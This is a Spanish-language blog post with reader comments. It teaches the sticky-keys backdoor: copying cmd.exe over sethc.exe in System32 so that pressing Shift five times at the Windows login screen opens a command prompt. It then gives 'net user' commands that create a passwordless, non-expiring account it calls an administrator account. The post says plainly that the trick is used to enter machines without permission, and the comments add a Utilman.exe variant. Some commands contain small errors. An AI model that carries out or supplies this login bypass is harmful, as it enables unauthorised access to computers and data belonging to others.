Explotar bug de Windows │ Sethc.exe & cmd.exe │Entrar sin cuenta de usuario,pass

No encontre este tema por aqui y me parecio primordial no, necesario para todo aquel interesado en Windows.

Este es un truco muy basico, tan basico y facil como antiguo y efectivo.
La modificacion consiste en que hay un bug y es que al iniciar windows no se deberian poder acceder a comandos pero se puede.
Si iniciamos el PC y nos encontramos en la pantalla principal:

nos encontramos con que si pulsamos varias veces la tecla de mayusculas seguidas nos sale el stickyKeys (Un programa con su respectivo proceso).

Tan solo debemos modificar el proceso este por el de la consola de comandos y podremos tener acceso a todos los archivos y localizaciones.


Comencemos:

Es muy sencillo. Abrimos session en Windows y en ejecutar escribimos cmd.exe o solamente cmd:

Ahora en la consola de comandos ponemos:

Código:
CD:\Windows\System32

Ahora metemos el codigo.
Con esto hacemos un respaldo y copy del sethc por si algun dia lo necesitamos o queremos volver a tenerlo.

Código:
copy sethc.exe backupsethc.exe


Habra salido bien si ponde : 1 Archivo copiado

Y ahora hacemos el intercambio:

Código:
Copy cmd.exe sethc.exe

Os preguntara: ¿Sobrescribir sethc.exe? (Sí/No/Todos)
Marcad : Si
y pondra : 1 archivo copiado

Ahora volvemos a salir de la sesion y pulsamos 5 veces la tecla mayuscula o hasta que se abra el cmd.exe o en este caso el sethc.exe:
Como sale aqui: Pinchar para ver la foto.

Ahora podemos crearnos cuentas de usuario, conectarnos a internet y hacer todo lo que hariamos si estuvieramos en una session. Normalmente este bug se suele explotar para entrar sin permiso. Para ello una vez abierto el cmd insertamos este codigo:
Para crear una cuenta de admin:

Código:
“net user [b]nombredeusuario [/b]/add /expires:never /passwordreq:no”

Para crear una cuenta de admin con pass:

Código:
“net user [b]nombredeusuario contraseña [/b]/add /expires:never”

Nombre de usuario: El nombre de la cuenta
Password: Ponemos la pass que queramos
Ahora reiniciamos y ya tendremos una cuenta de admin desde donde acceder.

Piensen la cantidad de utilidades de este bug. Un saludo y espero que les haya gustado el aporte.
By Panic !

Matías Moreno Cárdenas

Publicado por: Matías Moreno Cárdenas

Analista de Seguridad IT y hacking ético / Desarrollador de Software Multiplataforma. Actualmente analista de seguridad informática y hacking ético en Grupo SIA

  1. Es mas sencillo Utilman.exe
    Tecla de Inicio+U

    Responder

  2. En ves de CD C:Windowssystem32

    Podes hacer asi:

    cd %WINDIR%system32

    ya que algunos podrian tener instalado en otro disco al Windows.

    Responder

    1. Windows XP solo funciona en la particion C: del disco duro.

      Responder

Deja un comentario